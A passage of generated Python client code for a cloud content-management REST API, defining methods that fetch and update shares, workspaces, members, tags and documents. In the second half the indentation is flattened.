    >>> thread = api.get_contentmanagement_securityprofiles(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: SecurityProfileEntityListing
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['callback']
    params = {}
    for name, value in kwargs.items():
        # Only `callback` is accepted by this endpoint.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_securityprofiles" % name
            )
        params[name] = value

    resource_path = '/api/v2/contentmanagement/securityprofiles'.replace('{format}', 'json')
    path_params = {}
    query_params = {}

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='SecurityProfileEntityListing',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_share(self, share_id, **kwargs):
    """
    Retrieve details about an existing share.

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_share(share_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str share_id: Share ID (required)
    :param list[str] expand: Which fields, if any, to expand.
    :return: Share
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['share_id', 'expand', 'callback']
    params = {'share_id': share_id}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_share" % name
            )
        params[name] = value

    # The share id is mandatory and may not be None.
    if params.get('share_id') is None:
        raise ValueError("Missing the required parameter `share_id` when calling `get_contentmanagement_share`")

    resource_path = '/api/v2/contentmanagement/shares/{shareId}'.replace('{format}', 'json')
    path_params = {'shareId': params['share_id']}

    query_params = {}
    if 'expand' in params:
        query_params['expand'] = params['expand']

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='Share',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_shared_shared_id(self, shared_id, **kwargs):
    """
    Get shared documents. Securely download a shared document.
    This method requires the download sharing URI obtained in the get document response (downloadSharingUri). Documents may be shared between users in the same workspace. Documents may also be shared between any user by creating a content management share.

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_shared_shared_id(shared_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str shared_id: Shared ID (required)
    :param bool redirect: Turn on or off redirect
    :param str disposition: Request how the share content will be downloaded: attached as a file or inline. Default is attachment.
    :param str content_type: The requested format for the specified document. If supported, the document will be returned in that format. Example contentType=audio/wav
    :param str expand: Expand some document fields
    :return: SharedResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['shared_id', 'redirect', 'disposition',
                  'content_type', 'expand', 'callback']
    params = {'shared_id': shared_id}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_shared_shared_id" % name
            )
        params[name] = value

    # The shared id is mandatory and may not be None.
    if params.get('shared_id') is None:
        raise ValueError("Missing the required parameter `shared_id` when calling `get_contentmanagement_shared_shared_id`")

    resource_path = '/api/v2/contentmanagement/shared/{sharedId}'.replace('{format}', 'json')
    path_params = {'sharedId': params['shared_id']}

    # Translate snake_case keyword names to their camelCase wire names.
    query_params = {}
    for local_name, wire_name in [('redirect', 'redirect'),
                                  ('disposition', 'disposition'),
                                  ('content_type', 'contentType'),
                                  ('expand', 'expand')]:
        if local_name in params:
            query_params[wire_name] = params[local_name]

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='SharedResponse',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_shares(self, **kwargs):
    """
    Gets a list of shares. You must specify at least one filter (e.g. entityId).
    Failing to specify a filter will return 400.

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_shares(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str entity_id: Filters the shares returned to only the entity specified by the value of this parameter.
    :param list[str] expand: Which fields, if any, to expand.
    :param int page_size: Page size
    :param int page_number: Page number
    :return: ShareEntityListing
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['entity_id', 'expand', 'page_size', 'page_number', 'callback']
    params = {}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_shares" % name
            )
        params[name] = value

    resource_path = '/api/v2/contentmanagement/shares'.replace('{format}', 'json')
    path_params = {}

    # Translate snake_case keyword names to their camelCase wire names.
    query_params = {}
    for local_name, wire_name in [('entity_id', 'entityId'),
                                  ('expand', 'expand'),
                                  ('page_size', 'pageSize'),
                                  ('page_number', 'pageNumber')]:
        if local_name in params:
            query_params[wire_name] = params[local_name]

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='ShareEntityListing',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_status(self, **kwargs):
    """
    Get a list of statuses for pending operations

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_status(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int page_size: Page size
    :param int page_number: Page number
    :return: CommandStatusEntityListing
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['page_size', 'page_number', 'callback']
    params = {}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_status" % name
            )
        params[name] = value

    resource_path = '/api/v2/contentmanagement/status'.replace('{format}', 'json')
    path_params = {}

    # Translate snake_case keyword names to their camelCase wire names.
    query_params = {}
    for local_name, wire_name in [('page_size', 'pageSize'),
                                  ('page_number', 'pageNumber')]:
        if local_name in params:
            query_params[wire_name] = params[local_name]

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='CommandStatusEntityListing',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_status_status_id(self, status_id, **kwargs):
    """
    Get a status.

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_status_status_id(status_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str status_id: Status ID (required)
    :return: CommandStatus
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['status_id', 'callback']
    params = {'status_id': status_id}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_status_status_id" % name
            )
        params[name] = value

    # The status id is mandatory and may not be None.
    if params.get('status_id') is None:
        raise ValueError("Missing the required parameter `status_id` when calling `get_contentmanagement_status_status_id`")

    resource_path = '/api/v2/contentmanagement/status/{statusId}'.replace('{format}', 'json')
    path_params = {'statusId': params['status_id']}
    query_params = {}

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='CommandStatus',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_usage(self, **kwargs):
    """
    Get usage details.

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_usage(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: Usage
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['callback']
    params = {}
    for name, value in kwargs.items():
        # Only `callback` is accepted by this endpoint.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_usage" % name
            )
        params[name] = value

    resource_path = '/api/v2/contentmanagement/usage'.replace('{format}', 'json')
    path_params = {}
    query_params = {}

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='Usage',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_workspace(self, workspace_id, **kwargs):
    """
    Get a workspace.

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_workspace(workspace_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str workspace_id: Workspace ID (required)
    :param list[str] expand: Which fields, if any, to expand.
    :return: Workspace
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['workspace_id', 'expand', 'callback']
    params = {'workspace_id': workspace_id}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_workspace" % name
            )
        params[name] = value

    # The workspace id is mandatory and may not be None.
    if params.get('workspace_id') is None:
        raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace`")

    resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}'.replace('{format}', 'json')
    path_params = {'workspaceId': params['workspace_id']}

    query_params = {}
    if 'expand' in params:
        query_params['expand'] = params['expand']

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='Workspace',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_workspace_documents(self, workspace_id, **kwargs):
    """
    Get a list of documents.

    The request is synchronous by default; pass a `callback` function to
    perform it asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_contentmanagement_workspace_documents(workspace_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str workspace_id: Workspace ID (required)
    :param list[str] expand: Which fields, if any, to expand.
    :param int page_size: Page size
    :param int page_number: Page number
    :param str sort_by: name or dateCreated
    :param str sort_order: ascending or descending
    :return: DocumentEntityListing
        If the method is called asynchronously,
        returns the request thread.
    """
    recognized = ['workspace_id', 'expand', 'page_size',
                  'page_number', 'sort_by', 'sort_order', 'callback']
    params = {'workspace_id': workspace_id}
    for name, value in kwargs.items():
        # Reject any keyword this endpoint does not understand.
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_contentmanagement_workspace_documents" % name
            )
        params[name] = value

    # The workspace id is mandatory and may not be None.
    if params.get('workspace_id') is None:
        raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_documents`")

    resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/documents'.replace('{format}', 'json')
    path_params = {'workspaceId': params['workspace_id']}

    # Translate snake_case keyword names to their camelCase wire names.
    query_params = {}
    for local_name, wire_name in [('expand', 'expand'),
                                  ('page_size', 'pageSize'),
                                  ('page_number', 'pageNumber'),
                                  ('sort_by', 'sortBy'),
                                  ('sort_order', 'sortOrder')]:
        if local_name in params:
            query_params[wire_name] = params[local_name]

    header_params = {'Accept': self.api_client.select_header_accept(['application/json'])}
    if not header_params['Accept']:
        del header_params['Accept']
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='DocumentEntityListing',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=params.get('callback'))
def get_contentmanagement_workspace_member(self, workspace_id, member_id, **kwargs):
"""
Get a workspace member
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace_member(workspace_id, member_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str member_id: Member ID (required)
:param list[str] expand: Which fields, if any, to expand.
:return: WorkspaceMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'member_id', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace_member" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_member`")
# verify the required parameter 'member_id' is set
if ('member_id' not in params) or (params['member_id'] is None):
raise ValueError("Missing the required parameter `member_id` when calling `get_contentmanagement_workspace_member`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/members/{memberId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
if 'member_id' in params:
path_params['memberId'] = params['member_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkspaceMember',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspace_members(self, workspace_id, **kwargs):
"""
Get a list workspace members
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace_members(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param int page_size: Page size
:param int page_number: Page number
:param list[str] expand: Which fields, if any, to expand.
:return: WorkspaceMemberEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'page_size', 'page_number', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace_members" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_members`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/members'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkspaceMemberEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspace_tagvalue(self, workspace_id, tag_id, **kwargs):
"""
Get a workspace tag
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace_tagvalue(workspace_id, tag_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str tag_id: Tag ID (required)
:param list[str] expand: Which fields, if any, to expand.
:return: TagValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'tag_id', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace_tagvalue" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_tagvalue`")
# verify the required parameter 'tag_id' is set
if ('tag_id' not in params) or (params['tag_id'] is None):
raise ValueError("Missing the required parameter `tag_id` when calling `get_contentmanagement_workspace_tagvalue`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues/{tagId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
if 'tag_id' in params:
path_params['tagId'] = params['tag_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagValue',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspace_tagvalues(self, workspace_id, **kwargs):
"""
Get a list of workspace tags
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace_tagvalues(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str value: filter the list of tags returned
:param int page_size: Page size
:param int page_number: Page number
:param list[str] expand: Which fields, if any, to expand.
:return: TagValueEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'value', 'page_size', 'page_number', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace_tagvalues" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_tagvalues`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'value' in params:
query_params['value'] = params['value']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagValueEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspaces(self, **kwargs):
"""
Get a list of workspaces.
Specifying 'content' access will return all workspaces the user has document access to, while 'admin' access will return all group workspaces the user has administrative rights to.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspaces(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int page_size: Page size
:param int page_number: Page number
:param list[str] access: Requested access level.
:param list[str] expand: Which fields, if any, to expand.
:return: WorkspaceEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page_number', 'access', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspaces" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/contentmanagement/workspaces'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'access' in params:
query_params['access'] = params['access']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkspaceEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_auditquery(self, body, **kwargs):
"""
Query audits
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_auditquery(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ContentQueryRequest body: Allows for a filtered query returning facet information (required)
:return: QueryResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_auditquery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_auditquery`")
resource_path = '/api/v2/contentmanagement/auditquery'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QueryResults',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_document(self, document_id, body, **kwargs):
"""
Update a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_document(document_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param DocumentUpdate body: Document (required)
:param str expand: Expand some document fields
:param bool override: Override any lock on the document
:return: Document
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'body', 'expand', 'override']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_document" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `post_contentmanagement_document`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_document`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
if 'override' in params:
query_params['override'] = params['override']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Document',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_document_content(self, document_id, body, **kwargs):
"""
Replace the contents of a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_document_content(document_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param ReplaceRequest body: Replace Request (required)
:param bool override: Override any lock on the document
:return: ReplaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'body', 'override']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_document_content" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `post_contentmanagement_document_content`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_document_content`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}/content'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'override' in params:
query_params['override'] = params['override']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReplaceResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_documents(self, body, **kwargs):
"""
Add a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_documents(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param DocumentUpload body: Document (required)
:param str copy_source: Copy a document within a workspace or to a new workspace. Provide a document ID as the copy source.
:param str move_source: Move a document to a new workspace. Provide a document ID as the move source.
:param bool override: Override any lock on the source document
:return: Document
If the method is called asynchronously,
returns the request thread.
"""
